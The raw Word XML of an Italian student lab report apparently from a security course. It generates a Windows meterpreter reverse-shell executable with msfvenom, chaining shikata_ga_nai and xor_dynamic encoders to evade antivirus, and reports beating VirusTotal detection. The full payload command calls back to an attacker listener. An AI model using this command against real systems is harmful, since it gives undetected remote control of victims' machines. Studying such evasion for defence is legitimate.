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C6DF" w14:textId="567F4731" w:rsidR="004D7082" w:rsidRDefault="001944B4" w:rsidP="001944B4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001944B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>S9/L1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B255FB1" w14:textId="77777777" w:rsidR="001944B4" w:rsidRDefault="001944B4" w:rsidP="001944B4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="027D99ED" w14:textId="0699EAF3" w:rsidR="001944B4" w:rsidRDefault="001944B4" w:rsidP="001944B4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001944B4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>MALWARE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68022A21" w14:textId="2D52DE73" w:rsidR="001944B4" w:rsidRPr="001944B4" w:rsidRDefault="001944B4" w:rsidP="001944B4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">L’obiettivo di oggi consiste nel creare un malware utilizzando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> che sia meno rilevabile rispetto al seguente malware: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msfvenom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-p windows/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meterpreter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>/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reverse_tcp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LHOST</w:t>
      </w:r>
      <w:r w:rsidR="00F6213A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00F6213A" w:rsidRPr="00F6213A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>192.168.1.23 LPORT</w:t>
      </w:r>
      <w:r w:rsidR="00F6213A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00F6213A" w:rsidRPr="00F6213A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>5959 -a x86 --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platform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windows -e x86/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shikata_ga_nai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-i 200 -f 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raw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| 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msfvenom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-a x86 --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platform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windows -e x86/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xor_dynamic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-i 200 -f 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raw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| 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msfvenom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-a x86 --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platform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windows -e x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F6213A" w:rsidRPr="00F6213A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F6213A" w:rsidRPr="00F6213A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> -i 200 -o polimorficommm_v2.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FA901C" w14:textId="0F6DE7BA" w:rsidR="001944B4" w:rsidRDefault="002B2741" w:rsidP="001944B4">
      <w:r>
        <w:t xml:space="preserve">Analizzandolo su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F6213A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F6213A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00BE16F6" w:rsidRPr="00BE16F6">
        <w:t>strumento online che permette di analizzare file sospetti, URL e indirizzi IP per verificarne la sicurezza</w:t>
      </w:r>
      <w:r w:rsidR="00BE16F6">
        <w:t xml:space="preserve">) è possibile vedere il risultato è il seguente: </w:t>
      </w:r>
      <w:r w:rsidR="00BE16F6">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00BE16F6">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00BE16F6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3936D5B4" wp14:editId="170A7DAB">
            <wp:extent cx="6105525" cy="9429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AD95" w14:textId="77777777" w:rsidR="00BE16F6" w:rsidRDefault="00BE16F6" w:rsidP="001944B4"/>
    <w:p w14:paraId="39EB3570" w14:textId="77777777" w:rsidR="008A6627" w:rsidRDefault="00BE16F6" w:rsidP="001944B4">
      <w:r>
        <w:t xml:space="preserve">Il risultato è molto preoccupante, visto che la maggior parte dei </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F6213A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vendor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> non sono stati in grado di rilevarlo. Ma sfortunatamente, è possibile abbassare ulteriormente il punteggio modificando il malware di partenza. Questo sarà possibile aumentando il numero di iterazioni che verranno applicate all’encoder in maniera tale da offuscare ulteriormente il payload. </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Questa azione porterà sia vantaggi che svantaggi.  Nel primo caso, a</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE16F6">
        <w:t>umentando il numero di iterazioni, la probabilità che un antivirus rilevi il file diminuisce, poiché ogni iterazione altera la struttura del file</w:t>
      </w:r>
      <w:r>
        <w:t>. Nel secondo caso, i</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE16F6">
        <w:t>l payload potrebbe diventare più lento da eseguire, poiché ci sono più passaggi e maggiore elaborazione per decodificarlo.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A6627">
        <w:br/>
      </w:r>
      <w:r w:rsidR="008A6627">
        <w:br/>
        <w:t>Aumentando dunque il numero di iterazioni in ogni encoder da 100 a 300, il risultato sarà il seguente:</w:t>
      </w:r>
      <w:r w:rsidR="008A6627">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4805A8E1" wp14:editId="3D0510C4">
            <wp:extent cx="6115050" cy="12382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1A7F" w14:textId="77777777" w:rsidR="00F6213A" w:rsidRDefault="008A6627" w:rsidP="00F6213A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Con questa “semplice” modifica, è stato possibile bypassare </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F6213A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> facendo passare il malware come file non malevolo.</w:t>
      </w:r>
      <w:r w:rsidR="00F6213A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F6213A">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F6213A">
        <w:br/>
        <w:t xml:space="preserve">Ci sono svariati modi per bypassare i controlli. Si possono utilizzare encoder differenti e molto articolati per rendere più difficile il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F6213A">
        <w:t>detect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F6213A">
        <w:t xml:space="preserve"> di questi file. In questo caso è stato utilizzato l’encoder </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F6213A" w:rsidRPr="00F6213A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F6213A">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F6213A" w:rsidRPr="00F6213A">
        <w:t xml:space="preserve">uno degli encoder più conosciuti e utilizzati in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F6213A" w:rsidRPr="00F6213A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F6213A" w:rsidRPr="00F6213A">
        <w:t xml:space="preserve"> (e di conseguenza in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F6213A" w:rsidRPr="00F6213A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F6213A" w:rsidRPr="00F6213A">
        <w:t xml:space="preserve">) per offuscare i payloads. È un encoder </w:t>
      </w:r>
      <w:r w:rsidR="00F6213A" w:rsidRPr="00F6213A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>polimorfico</w:t>
      </w:r>
      <w:r w:rsidR="00F6213A" w:rsidRPr="00F6213A">
        <w:t>, che modifica la struttura di un payload ogni volta che viene applicato, rendendolo più difficile da rilevare dai sistemi di sicurezza.</w:t>
      </w:r>
      <w:r w:rsidR="00F6213A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F6213A">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C19026E" w14:textId="77777777" w:rsidR="00F6213A" w:rsidRDefault="00F6213A" w:rsidP="001944B4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F6213A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>xor_dynamic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F6213A">
        <w:t xml:space="preserve"> è un altro encoder disponibile in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F6213A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F6213A">
        <w:t xml:space="preserve"> che viene utilizzato per offuscare un payload. Come suggerisce il nome</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6213A">
        <w:t xml:space="preserve"> si basa sull'operazione di </w:t>
      </w:r>
      <w:r w:rsidRPr="00F6213A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XOR</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6213A">
        <w:t xml:space="preserve">, che è una delle tecniche di codifica più comuni nel contesto della </w:t>
      </w:r>
      <w:r w:rsidRPr="00F6213A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cybersecurity</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6213A">
        <w:t xml:space="preserve"> per nascondere e offuscare i dati.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E3C32D" w14:textId="2D47D0BD" w:rsidR="00BE16F6" w:rsidRDefault="00C65E88" w:rsidP="001944B4">
      <w:r>
        <w:t xml:space="preserve">Per concludere si è riutilizzato l’encoder </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> per mescolare ulteriormente il payload. Rendendo ancora più difficile l’intercettazione del malware. </w:t>
      </w:r>
      <w:r w:rsidR="00F6213A">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F6213A">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F6213A">
        <w:br/>
      </w:r>
      <w:r w:rsidR="008A6627">
        <w:br/>
      </w:r>
      <w:r w:rsidR="008A6627">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00BE16F6">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00BE16F6">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="214CF8D1" w14:textId="77777777" w:rsidR="00BE16F6" w:rsidRDefault="00BE16F6" w:rsidP="001944B4"/>
    <w:p w14:paraId="068F255D" w14:textId="77777777" w:rsidR="00BE16F6" w:rsidRPr="001944B4" w:rsidRDefault="00BE16F6" w:rsidP="001944B4"/>
    <w:sectPr w:rsidR="00BE16F6" w:rsidRPr="00194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B4"/>
    <w:rsid w:val="001944B4"/>
    <w:rsid w:val="00240755"/>
    <w:rsid w:val="002B2741"/>
    <w:rsid w:val="004D7082"/>
    <w:rsid w:val="008A6627"/>
    <w:rsid w:val="00AA0E9D"/>
    <w:rsid w:val="00BE16F6"/>
    <w:rsid w:val="00C65E88"/>
    <w:rsid w:val="00CB0FDF"/>
    <w:rsid w:val="00F6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46D8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{85C4C9CB-3719-4872-B176-4057BC87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44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44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44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44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44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44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44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44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44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44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44B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621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6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-25T15:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-25T16:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>